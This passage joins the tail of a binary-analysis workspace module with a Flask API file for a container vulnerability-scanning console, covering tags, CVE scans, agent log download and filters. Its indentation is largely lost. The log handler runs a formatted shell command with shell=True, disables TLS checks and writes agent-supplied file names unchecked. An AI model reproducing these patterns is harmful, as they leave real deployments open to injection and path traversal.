name = fpart + '.' + joinstr.join([prefix, npart]) + '_%s' % vapart
return name
##########################################################
#
# The envi.symstore.resolver.SymbolResolver API...
#
def getSymByName(self, name):
# Check for a sym
va = self.vaByName(name)
if va is not None:
return e_resolv.Symbol(name, va, 0)
# check for the need for a deref.
d = self.filemeta.get(name)
if d is not None:
return VivFileSymbol(self, name, d.get("imagebase"), 0, self.psize)
def getSymByAddr(self, addr, exact=True):
name = self.getName(addr)
if name is None:
if self.isValidPointer(addr):
name = "loc_%.8x" % addr
if name is not None:
#FIXME fname
#FIXME functions/segments/etc...
return e_resolv.Symbol(name, addr, 0)
def setSymHint(self, va, idx, hint):
'''
Set a symbol hint which will be used in place of operand
values during disassembly among other things...
You may also set hint=None to delete sym hints.
'''
self._fireEvent(VWE_SYMHINT, (va, idx, hint))
def getSymHint(self, va, idx):
h = self.getFref(va, idx)
if h is not None:
f = self.getFunction(va)
loctup = self.getFunctionLocal(f, h)
if loctup:
return loctup[1]
return self.symhints.get((va, idx), None)
class VivFileSymbol(e_resolv.FileSymbol):
# A namespace tracker thingie...
def __init__(self, vw, fname, base, size, width=4):
self.vw = vw
e_resolv.FileSymbol.__init__(self, fname, base, size, width)
def getSymByName(self, name):
return self.vw.getSymByName("%s.%s" % (self.name, name))
def getVivPath(*pathents):
dname = os.path.dirname(__file__)
dname = os.path.abspath(dname)
return os.path.join(dname, *pathents)
##############################################################################
# The following are touched during the release process by bump2version.
# You should have no reason to modify these directly
version = (1, 0, 5)
verstring = '.'.join([str(x) for x in version])
commit = ''
|
resource_api.py
|
from flask import Blueprint, request
from flask_jwt_extended import jwt_required, get_jwt_identity
from models.node_tags import NodeTags
from models.scheduler import Scheduler
from models.container_image_registry import RegistryCredential
from models.user import User, Role
from flask import current_app
from utils.response import set_response
from utils.decorators import non_read_only_user, admin_user_only
from utils.custom_exception import InternalError, InvalidUsage, DFError, Forbidden
from utils.helper import websocketio_channel_name_format, get_random_string, mkdir_recursive, rmdir_recursive
import json
from utils import resource
from resource_models.node import Node
from utils import constants
from croniter import croniter
from utils.esconn import ESConn
from utils.constants import ES_TERMS_AGGR_SIZE
import urllib.parse
import requests
from config.redisconfig import redis
import subprocess
import os
from copy import deepcopy
from flask import send_from_directory
import multiprocessing
from utils.node_utils import NodeUtils
import time
import eventlet
resource_api = Blueprint("resource_api", __name__)
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_ADD_TAGS, methods=["POST"],
endpoint="api_v1_5_add_tags")
@jwt_required
@non_read_only_user
def add_tags(node_id):
"""
Node Control API - Add User Defined Tags
---
tags:
- Node Control
security:
- Bearer: []
operationId: addUserDefinedTags
description: Add given tags to this node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Add tags to this node for easy identification
schema:
type: object
properties:
user_defined_tags:
type: array
example: [prod, dev]
uniqueItems: true
default: []
description: Add tags to this node for easy identification
items:
type: string
example: dev
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
post_data = request.json
if not post_data:
post_data = {}
tags = post_data.get('user_defined_tags', [])
if type(tags) != list:
raise InvalidUsage("user_defined_tags must be of list type")
            tags = [tag for tag in tags if tag]
            if not tags:
                raise InvalidUsage("user_defined_tags must not be empty")
set_node_tags_in_db(node, tags, "add_tags")
return set_response(data=node.set_tags(tags, "add_user_defined_tags"))
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_ADD_TAGS, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_ADD_TAGS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
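# Illustrative request body for the add/delete tag endpoints (the URL prefix this
# blueprint is mounted under is not defined in this file):
#   POST .../node/<node_id>/<NODE_ACTION_ADD_TAGS>?scope_id=...&node_type=host
#   {"user_defined_tags": ["prod", "dev"]}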
def set_node_tags_in_db(node, tags, action):
node_name = ""
present_tags = []
node_tag = None
node_tags_list = []
image_parent_host_names = []
if node.type == constants.NODE_TYPE_HOST:
node_name = node.host_name
node_tag = NodeTags.query.filter_by(host_name=node.host_name, node_name=node_name,
node_type=node.type).one_or_none()
if node_tag:
present_tags = str(node_tag.tags).split(",")
if node.type == constants.NODE_TYPE_CONTAINER:
node_name = node.docker_container_id
node_tag = NodeTags.query.filter_by(host_name=node.host_name, node_name=node_name,
node_type=node.type).one_or_none()
if node_tag:
present_tags = str(node_tag.tags).split(",")
elif node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
node_name = node.image_name_tag
for parent in node.node_details_formatted.get("parents", []):
if parent.get("type", "") == constants.NODE_TYPE_HOST and parent.get("label", ""):
image_parent_host_names.append(parent["label"])
node_tags_list = NodeTags.query.filter(NodeTags.host_name.in_(image_parent_host_names),
NodeTags.node_name == node_name, NodeTags.node_type == node.type).all()
if node_tags_list:
present_tags = str(node_tags_list[0].tags).split(",")
if action == "add_tags":
present_tags.extend(tags)
present_tags = list(set(present_tags))
elif action == "delete_tags":
for tag in tags:
if tag in present_tags:
present_tags.remove(tag)
if present_tags:
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER:
if not node_tag:
node_tag = NodeTags(host_name=node.host_name, node_name=node_name, node_type=node.type)
node_tag.tags = ",".join(present_tags)
node_tag.save()
elif node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
host_node_tag_map = {node_tag.host_name: node_tag for node_tag in node_tags_list}
for parent_host_name in image_parent_host_names:
if parent_host_name in host_node_tag_map:
node_tag = host_node_tag_map[parent_host_name]
node_tag.tags = ",".join(present_tags)
node_tag.save()
else:
node_tag = NodeTags(host_name=parent_host_name, node_name=node_name, node_type=node.type)
node_tag.tags = ",".join(present_tags)
node_tag.save()
else:
if node_tag:
node_tag.delete()
if node_tags_list:
for node_tag in node_tags_list:
node_tag.delete()
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_DELETE_TAGS, methods=["POST"],
endpoint="api_v1_5_delete_tags")
@jwt_required
@non_read_only_user
def delete_tags(node_id):
"""
Node Control API - Delete User Defined Tags
---
tags:
- Node Control
security:
- Bearer: []
operationId: deleteUserDefinedTags
description: Delete given tags from this node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Delete given tags from this node
schema:
type: object
properties:
user_defined_tags:
type: array
example: [prod, dev]
uniqueItems: true
default: []
description: Delete given tags from this node
items:
type: string
example: dev
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
post_data = request.json
if not post_data:
post_data = {}
tags = post_data.get('user_defined_tags', [])
if type(tags) != list:
raise InvalidUsage("user_defined_tags must be of list type")
            tags = [tag for tag in tags if tag]
            if not tags:
                raise InvalidUsage("user_defined_tags must not be empty")
set_node_tags_in_db(node, tags, "delete_tags")
return set_response(data=node.set_tags(tags, "delete_user_defined_tags"))
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_DELETE_TAGS, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_DELETE_TAGS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_START, methods=["POST"],
endpoint="api_v1_5_start_cve")
@jwt_required
@non_read_only_user
def start_cve(node_id):
"""
Node Control API - Start CVE
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: startCVE
description: Start CVE on a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Options to start cve
schema:
type: object
properties:
scan_type:
type: array
uniqueItems: true
description: Base and language specific scan types
example: ["base"]
items:
type: string
enum: [base, java, python, ruby, php, nodejs, js, dotnet]
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
post_data = {}
if request.is_json:
post_data = request.json
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
scan_types = post_data.get("scan_type", None)
if not scan_types or type(scan_types) != list:
scan_types = constants.CVE_SCAN_TYPES
else:
scan_types = list(set(scan_types + ["base"]) & set(constants.CVE_SCAN_TYPES))
scan_this_cluster = bool(post_data.get("scan_this_cluster", False))
scan_this_namespace = bool(post_data.get("scan_this_namespace", False))
mask_cve_ids = post_data.get("mask_cve_ids", [])
if scan_this_cluster:
if node.type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER]:
raise InvalidUsage("scan_this_cluster option available for images")
if not node.kubernetes_cluster_id:
raise InvalidUsage("scan_this_cluster option available only in kubernetes nodes")
if scan_this_namespace:
if node.type != constants.NODE_TYPE_CONTAINER:
raise InvalidUsage("scan_this_namespace option available for for containers only")
if not node.kubernetes_cluster_id:
raise InvalidUsage("scan_this_cluster option available only in kubernetes nodes")
# action/event/resources/success
node_json = node.pretty_print()
resources = [{
"scan_types": scan_types,
node_json["node_type"]: node_json,
}]
from tasks.user_activity import create_user_activity
jwt_identity = get_jwt_identity()
create_user_activity.delay(jwt_identity["id"], constants.ACTION_START, constants.EVENT_VULNERABILITY_SCAN,
resources=resources, success=True)
df_id_to_scope_id_map = {}
topology_hosts_data = {}
topology_containers_data = {}
from config.redisconfig import redis
if scan_this_cluster or scan_this_namespace:
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node.type.upper())
redis_pipe.get(websocketio_channel_name_format(constants.NODE_TYPE_HOST + "?format=deepfence")[1])
redis_pipe.get(websocketio_channel_name_format(constants.NODE_TYPE_CONTAINER + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_hosts_data = json.loads(redis_resp[1])
if redis_resp[2]:
topology_containers_data = json.loads(redis_resp[2])
if scan_this_cluster:
node_list = []
redis_lock_keys = []
redis_pipe = redis.pipeline()
# Scan all hosts in the cluster
for host_node_id, host_details in topology_hosts_data.items():
if host_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id:
try:
host_node = Node(host_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_hosts_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, host_node.host_name)
redis_pipe.incr(lock_key)
node_list.append(host_node)
redis_lock_keys.append(lock_key)
except:
pass
# Scan all container images in the cluster
image_scan_started = []
for container_node_id, container_details in topology_containers_data.items():
if container_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id \
and container_details.get("image_name_with_tag"):
if container_details["image_name_with_tag"] in image_scan_started:
continue
try:
container_node = Node(container_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_containers_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START,
container_node.image_name_tag)
redis_pipe.incr(lock_key)
node_list.append(container_node)
redis_lock_keys.append(lock_key)
image_scan_started.append(container_details["image_name_with_tag"])
except:
pass
redis_resp = redis_pipe.execute()
for i, tmp_node in enumerate(node_list):
if redis_resp[i] != 1:
continue
try:
tmp_node.cve_scan_start(scan_types)
except:
continue
time.sleep(1)
redis_pipe = redis.pipeline()
for lock_key in redis_lock_keys:
                    redis_pipe.delete(lock_key)
redis_pipe.execute()
return set_response(data=True)
elif scan_this_namespace:
node_list = []
redis_lock_keys = []
redis_pipe = redis.pipeline()
image_scan_started = []
current_namespace = node.container_name.split("/")[0]
for container_node_id, container_details in topology_containers_data.items():
if container_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id \
and container_details.get("image_name_with_tag") \
and container_details.get("container_name"):
if container_details["image_name_with_tag"] in image_scan_started:
continue
k8s_namespace = container_details["container_name"].split("/")[0]
if k8s_namespace != current_namespace:
continue
try:
container_node = Node(container_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_containers_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START,
container_node.image_name_tag)
redis_pipe.incr(lock_key)
node_list.append(container_node)
redis_lock_keys.append(lock_key)
image_scan_started.append(container_details["image_name_with_tag"])
except:
pass
redis_resp = redis_pipe.execute()
for i, tmp_node in enumerate(node_list):
if redis_resp[i] != 1:
continue
try:
tmp_node.cve_scan_start(scan_types)
except:
continue
time.sleep(1)
redis_pipe = redis.pipeline()
for lock_key in redis_lock_keys:
                    redis_pipe.delete(lock_key)
redis_pipe.execute()
return set_response(data=True)
else:
lock_key = ""
if node.type == constants.NODE_TYPE_HOST:
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, node.host_name)
else:
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, node.image_name_tag)
redis_resp = redis.incr(lock_key)
if redis_resp != 1:
raise DFError("CVE scan on this node is already in progress")
resp = False
try:
resp = node.cve_scan_start(scan_types, ",".join(mask_cve_ids))
except Exception as ex:
redis.delete(lock_key)
raise ex
time.sleep(1)
redis.delete(lock_key)
return set_response(data=resp)
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_START,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_START, err))
raise InvalidUsage(err.message)
except Exception as ex:
# import traceback
# track = traceback.format_exc()
# print(track)
raise InternalError(str(ex))
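# Illustrative client sketch for the endpoint above (the console host, API prefix
# and JWT are placeholders, not values defined in this file):
#
#   import requests
#   resp = requests.post(
#       "https://<console-host>/<api-prefix>/node/<node_id>/" + constants.NODE_ACTION_CVE_SCAN_START,
#       headers={"Authorization": "Bearer <jwt>"},
#       json={"scan_type": ["base", "java"], "scan_this_cluster": False},
#       verify=False,
#   )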
@resource_api.route("/get_logs", methods=["POST"], endpoint="api_v1_5_get_logs_from_agents")
@jwt_required
@admin_user_only
def get_logs_from_agents():
"""
API to get the agent logs
"""
payloads = request.json
node_id_list = payloads.get('node_id_list', None)
if not node_id_list:
raise InvalidUsage("node_id_list must not be empty")
if type(node_id_list) != list:
raise InvalidUsage("node_id_list must be list of node ids")
node_type = payloads.get('node_type', None)
if node_type != "host":
raise InvalidUsage("node_type must be host")
topology_data_df_format = {}
try:
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node_type.upper())
redis_pipe.get(websocketio_channel_name_format(node_type + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_data_df_format = json.loads(redis_resp[1])
if not topology_data_df_format:
raise DFError("No agents data available")
except Exception as e:
        raise InvalidUsage(str(e))
random_string = get_random_string(10)
download_path = os.path.join("/tmp/deepfence-logs-download", random_string)
mkdir_recursive(download_path)
zip_path = os.path.join("/tmp/deepfence-logs", random_string)
mkdir_recursive(zip_path)
def get_logs_from_agents_task(node_id):
try:
eventlet.monkey_patch()
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
applicable_scans_api_url = constants.SCOPE_HOST_API_CONTROL_URL.format(
probe_id=node.probe_id, host_name=node.host_name, action="get_logs_from_agent")
with eventlet.Timeout(10):
resp = requests.post(applicable_scans_api_url, data='{}', verify=False)
response_data = resp.json()
if resp.status_code != 200:
raise InvalidUsage("Error: could not get logs from agent")
for single_file_info in response_data["agent_logs"]:
host_download_path = os.path.join(download_path, node.host_name)
mkdir_recursive(host_download_path)
                with open(os.path.join(host_download_path, single_file_info["file_name"]), "w+") as f:
                    f.write(single_file_info["data"])
except:
pass
processes = []
num_of_thread = 20
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
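    # e.g. chunks([p1, p2, p3, p4, p5], 2) yields [p1, p2], [p3, p4], [p5]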
for node_id in node_id_list:
p = multiprocessing.Process(target=get_logs_from_agents_task, args=(node_id,))
processes.append(p)
try:
for i in chunks(processes, num_of_thread):
for j in i:
j.start()
for j in i:
j.join()
except Exception as e:
        raise InvalidUsage(str(e))
if not os.listdir(download_path):
raise InvalidUsage("logs has not been generated")
subprocess.run("tar -C {0} -zcvf {1}/deepfence-agent-logs.tar.gz .".format(download_path, zip_path), shell=True)
rmdir_recursive(download_path)
# from tasks.reaper_tasks import delete_old_agent_logs
# delete_old_agent_logs.delay(zip_path)
return send_from_directory(zip_path, filename="deepfence-agent-logs.tar.gz", as_attachment=True), 200
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_STOP, methods=["POST"],
endpoint="api_v1_5_stop_cve")
@jwt_required
@non_read_only_user
def stop_cve(node_id):
"""
Node Control API - Stop CVE
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: stopCVE
description: Stop CVE on a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
# action/event/resources/success
node_json = node.pretty_print()
resources = [{
node_json["node_type"]: node_json,
}]
from tasks.user_activity import create_user_activity
jwt_identity = get_jwt_identity()
create_user_activity.delay(jwt_identity["id"], constants.ACTION_STOP, constants.EVENT_VULNERABILITY_SCAN,
resources=resources, success=True)
return set_response(data=node.cve_scan_stop())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_STOP,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_STOP, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_STATUS, methods=["GET"],
endpoint="api_v1_5_cve_status")
@jwt_required
def cve_status(node_id):
"""
Node Control API - CVE Status
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: cveStatus
description: CVE Status for a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
return set_response(data=node.get_cve_status())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_STATUS,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_STATUS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ATTACK_PATH, methods=["GET"],
endpoint="api_v1_5_attack_path")
@jwt_required
def get_attack_path(node_id):
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
return set_response(data=node.get_attack_path())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ATTACK_PATH, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ATTACK_PATH, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<node_id>", methods=["GET"], endpoint="api_v1_5_node_details")
@jwt_required
def get_node_detail(node_id):
"""
Node Details API
---
tags:
- Node Control
security:
- Bearer: []
operationId: nodeDetails
description: Get full details of a node (hosts, containers, images, processes) by node_id
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node(node_id)
return set_response(node.node_details_formatted)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/enumerate_filters", methods=["GET"], endpoint="api_v1_5_enumerate_filters")
@jwt_required
def enumerate_node_filters():
"""
Enumerate Filters API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: enumerateFilters
description: Get filter options for enumerate nodes api
parameters:
- name: node_type
in: query
type: string
required: true
description: Node type
enum: [host, container, container_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
- name: resource_type
in: query
type: string
required: true
description: Resource type
enum: [cve]
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
# number, time_unit, lucene_query_string => used in vulnerability filters, not topology
number = request.args.get("number")
time_unit = request.args.get("time_unit")
if bool(number is not None) ^ bool(time_unit):
raise InvalidUsage("Require both number and time_unit or ignore both of them.")
if number:
try:
number = int(number)
except ValueError:
raise InvalidUsage("Number should be an integer value.")
if time_unit and time_unit not in constants.TIME_UNIT_MAPPING.keys():
raise InvalidUsage("time_unit should be one of these, month/day/hour/minute")
lucene_query_string = request.args.get("lucene_query")
if lucene_query_string:
lucene_query_string = urllib.parse.unquote(lucene_query_string)
node_types_str = str(request.args.get("node_type", ''))
node_types = []
if node_types_str:
node_types = node_types_str.split(",")
filters_needed = request.args.get("filters", None)
resource_types_str = str(request.args.get('resource_type', ''))
resource_types = []
if resource_types_str:
resource_types = resource_types_str.split(",")
resource_filters = []
for resource_type in resource_types:
if resource_type not in [constants.CVE_INDEX]:
print('Invalid resource_type {}. Skipping'.format(resource_type))
continue
if resource_type == constants.CVE_INDEX:
# Get `container` info from `cve` and `host` / `container_image` data from `cve-scan`
cve_aggs = {"cve_container_name": {
"terms": {"field": "cve_container_name.keyword", "size": constants.ES_TERMS_AGGR_SIZE}}}
cve_filters = {"type": constants.CVE_INDEX}
cve_aggs_query = ESConn.aggregation_helper(
constants.CVE_INDEX, cve_filters, cve_aggs, number,
constants.TIME_UNIT_MAPPING.get(time_unit), lucene_query_string, get_only_query=True)
cve_scan_aggs = {
"node_type": {
"terms": {"field": "node_type.keyword", "size": 10},
"aggs": {"node_id": {"terms": {"field": "node_id.keyword", "size": ES_TERMS_AGGR_SIZE}},
"node_status": {"terms": {"field": "action.keyword", "size": ES_TERMS_AGGR_SIZE}}}
}
}
cve_scan_aggs_query = ESConn.aggregation_helper(
constants.CVE_SCAN_LOGS_INDEX, {"action": ["COMPLETED", "ERROR"]}, cve_scan_aggs, number,
constants.TIME_UNIT_MAPPING.get(time_unit), lucene_query_string, add_masked_filter=False,
get_only_query=True)
search_queries = [
{"index": constants.CVE_INDEX}, cve_aggs_query,
{"index": constants.CVE_SCAN_LOGS_INDEX}, cve_scan_aggs_query
]
aggs_responses = ESConn.msearch(search_queries).get("responses", [])
filters_actions = []
filters_host_name = []
filters_container_name = []
filters_image_name = []
for container_bkt in aggs_responses[0].get("aggregations", {}).get(
"cve_container_name", {}).get("buckets", []):
if container_bkt["key"] and container_bkt["key"] not in filters_container_name:
filters_container_name.append(container_bkt["key"])
for node_type_bkt in aggs_responses[1].get("aggregations", {}).get("node_type", {}).get("buckets", []):
for node_id_bkt in node_type_bkt.get("node_id", {}).get("buckets", []):
if node_type_bkt["key"] == constants.NODE_TYPE_HOST:
if node_id_bkt["key"] and node_id_bkt["key"] not in filters_host_name:
filters_host_name.append(node_id_bkt["key"])
elif node_type_bkt["key"] == constants.NODE_TYPE_CONTAINER_IMAGE:
if node_id_bkt["key"] and node_id_bkt["key"] not in filters_image_name:
filters_image_name.append(node_id_bkt["key"])
for scan_action_bkt in node_type_bkt.get("node_status", {}).get("buckets", []):
if scan_action_bkt["key"] and scan_action_bkt["key"] not in filters_actions:
filters_actions.append(scan_action_bkt["key"])
if filters_host_name:
details = {"label": "Hostname", "name": "host_name", "options": filters_host_name, "type": "string"}
if node_types:
if constants.NODE_TYPE_HOST in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_image_name:
details = {"label": "Image Name", "name": "image_name_with_tag", "options": filters_image_name,
"type": "string"}
if node_types:
if constants.NODE_TYPE_CONTAINER_IMAGE in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_container_name:
details = {"label": "Container Name", "name": "container_name", "options": filters_container_name,
"type": "string"}
if node_types:
if constants.NODE_TYPE_CONTAINER in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_actions:
details = {"label": "Status", "name": "action", "options": filters_actions, "type": "string"}
resource_filters.append(details)
node_types = [constants.NODE_TYPE_HOST]
filters_needed = "kubernetes_cluster_name"
if filters_needed:
filters_needed = str(filters_needed).split(",")
if not node_types:
raise InvalidUsage("node_type is required")
filter_keys = []
for node_type in node_types:
if node_type not in constants.NODE_TYPES_ALL:
raise InvalidUsage("node_type '{0}' is invalid".format(node_type))
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
registry_id = request.args.get("registry_id")
if not registry_id:
raise InvalidUsage("registry_id is required")
filter_keys.append("{0}{1}:{2}".format(constants.TOPOLOGY_FILTERS_PREFIX, node_type.upper(), registry_id))
else:
filter_keys.append(constants.TOPOLOGY_FILTERS_PREFIX + node_type.upper())
from config.redisconfig import redis
topology_filters = redis.mget(filter_keys)
response = {"filters": []}
added_filters = {}
added_count = 0
for topology_filter in topology_filters:
if not topology_filter:
continue
filter_items = json.loads(topology_filter)
for item in filter_items:
to_add = False
if filters_needed:
if item["name"] in filters_needed:
to_add = True
else:
to_add = True
if to_add:
if item["name"] in added_filters:
found_index = added_filters[item["name"]]
tmp_options = list(set(item["options"] + response["filters"][found_index]["options"]))
response["filters"][found_index]["options"] = tmp_options
else:
response["filters"].append(item)
added_filters[item["name"]] = added_count
added_count += 1
merged_filters = []
# if node_types are passed remove filters generated by resource_type which are not applicable to node_types
if resource_filters and response.get('filters'):
merged_filters = resource_filters + response.get('filters')
# merged_filters = list(filter(lambda x: x.get('name') in [y.get('name') for y in response.get('filters')],
# resource_filters))
elif node_types and response.get('filters'):
merged_filters = response.get('filters')
else:
merged_filters = resource_filters
filter_index = {}
for resource_filter in merged_filters:
if resource_filter.get('name') in filter_index:
existing_resource_filter = filter_index[resource_filter.get('name')]
existing_options = set(existing_resource_filter.get('options'))
current_options = set(resource_filter.get('options'))
new_options = current_options - existing_options
updated_options = existing_resource_filter.get('options') + list(new_options)
existing_resource_filter['options'] = updated_options
else:
filter_index[resource_filter.get('name')] = resource_filter
all_filters = [value for value in filter_index.values()]
all_filters.sort(key=lambda x: x.get('name'))
return set_response(data={'filters': all_filters})
@resource_api.route("/scheduled_tasks", methods=["GET"], endpoint="api_v1_5_scheduled_tasks_list")
@jwt_required
def list_scheduled_tasks():
"""
Scheduled Tasks API
---
tags:
- Scheduled Tasks
security:
- Bearer: []
operationId: getScheduledTasks
description: Get list of all scheduled tasks
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
scheduled_tasks = Scheduler.query.order_by(Scheduler.created_at.asc()).all()
if not scheduled_tasks:
scheduled_tasks = []
response = {"scheduled_tasks": [{
"id": task.id, "created_at": str(task.created_at), "action": task.action, "description": task.description,
"cron": task.cron_expr, "status": task.status, "last_ran_at": str(task.last_ran_at),
"node_names": task.node_names, "is_enabled": task.is_enabled, "node_type": task.nodes.get("node_type", "")
} for task in scheduled_tasks]}
return set_response(data=response)
@resource_api.route("/scheduled_tasks/update", methods=["POST"], endpoint="api_v1_5_scheduled_tasks_update")
@jwt_required
@non_read_only_user
